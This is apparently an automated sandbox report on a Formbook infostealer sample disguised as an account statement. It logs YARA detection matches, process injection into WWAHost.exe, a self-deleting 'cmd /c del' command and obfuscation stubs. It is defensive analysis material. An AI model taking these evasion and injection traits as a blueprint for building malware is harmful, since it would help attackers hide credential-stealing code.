          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040A2E909_2_040A2E90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414EEDB9_2_0414EEDB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04132F309_2_04132F30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040D2F289_2_040D2F28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040B0F309_2_040B0F30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04104F409_2_04104F40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0410EFA09_2_0410EFA0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04082FC89_2_04082FC8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0409CFE09_2_0409CFE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0409A8409_2_0409A840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040928409_2_04092840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040768B89_2_040768B8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040BE8F09_2_040BE8F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040A69629_2_040A6962
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040929A09_2_040929A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0415A9A69_2_0415A9A6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0408EA809_2_0408EA80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414AB409_2_0414AB40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: String function: 014D7E54 appears 111 times
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: String function: 0150F290 appears 105 times
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: String function: 014C5130 appears 58 times
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: String function: 014FEA12 appears 86 times
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: String function: 0147B970 appears 280 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 040FEA12 appears 49 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 0017318B appears 128 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 0410F290 appears 80 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 00192F80 appears 922 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 040D7E54 appears 50 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 00194C81 appears 35 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 0016E951 appears 387 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 0407B970 appears 75 times
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 00194FF1 appears 138 times
          Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMiPro.dll, vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000000.00000000.2038477421.0000000000CC6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameStatement of Account #8363672.exeT vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000000.00000002.2494382664.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000000.00000002.2509254740.00000000074B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll, vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMiPro.dll, vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003150000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameWWAHost.exej% vs yaM8XR1HfL.exe
          Source: yaM8XR1HfL.exe | Binary or memory string: OriginalFilenameStatement of Account #8363672.exeT vs yaM8XR1HfL.exe
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: yaM8XR1HfL.exe PID: 1288, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: WWAHost.exe PID: 4424, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: yaM8XR1HfL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/1@2/1
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_001BED2C memset,memset,EnterCriticalSection,FormatMessageW,GetLastError,FormatMessageW,GetLastError,GetCurrentThreadId,LocalFree
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yaM8XR1HfL.exe.log
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
          Source: yaM8XR1HfL.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: yaM8XR1HfL.exe | ReversingLabs: Detection: 68%
          Source: unknown | Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: windowscodecs.dll
          Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: yaM8XR1HfL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: yaM8XR1HfL.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: WWAHost.pdb source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: yaM8XR1HfL.exe, yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match File source: 0.2.yaM8XR1HfL.exe.3a926c0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.yaM8XR1HfL.exe.3a926c0.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.yaM8XR1HfL.exe.53f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.yaM8XR1HfL.exe.53f0000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.2494695632.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR
          Source: yaM8XR1HfL.exe, w4M6D.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0014AA8C GetCurrentThreadId,LoadLibraryW,GetProcAddress, 9_2_0014AA8C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_05C313BF push cs; ret 0_2_05C313CE
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07210EC5 push FFFFFFE9h; ret 0_2_07210EC7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07210DC6 push FFFFFFE9h; retn 0001h 0_2_07210DC8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07219191 pushad ; ret 0_2_072191A3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_075659EB push FFFFFFC3h; ret 0_2_07565A25
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDF508 push 00000059h; ret 0_2_07CDF516
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145225F pushad ; ret 4_2_014527F9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014527FA pushad ; ret 4_2_014527F9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014809AD push ecx; mov dword ptr [esp], ecx 4_2_014809B6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145283D push eax; iretd 4_2_01452858
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145135E push eax; iretd 4_2_01451369
          Source: C:\Windows\explorer.exe Code function: 7_2_0925BB02 push esp; retn 0000h 7_2_0925BB03
          Source: C:\Windows\explorer.exe Code function: 7_2_0925BB1E push esp; retn 0000h 7_2_0925BB1F
          Source: C:\Windows\explorer.exe Code function: 7_2_0925B9B5 push esp; retn 0000h 7_2_0925BAE7
          Source: C:\Windows\explorer.exe Code function: 7_2_106E49B5 push esp; retn 0000h 7_2_106E4AE7
          Source: C:\Windows\explorer.exe Code function: 7_2_106E4B02 push esp; retn 0000h 7_2_106E4B03
          Source: C:\Windows\explorer.exe Code function: 7_2_106E4B1E push esp; retn 0000h 7_2_106E4B1F
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00126F7C push eax; retf 9_2_00126F85
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127036 push eax; retf 9_2_00127EF1
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127026 pushad ; iretd 9_2_00127029
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00173168 push ecx; ret 9_2_0017317B
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00129431 push ds; iretd 9_2_00129432
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00129537 push esi; retf 9_2_0012954C
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0012959A push CFE2086Ah; ret 9_2_001295AB
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001296FD push ds; iretd 9_2_001296FE
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127CEA push eax; retf 9_2_00127EF1
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040527FA pushad ; ret 9_2_040527F9
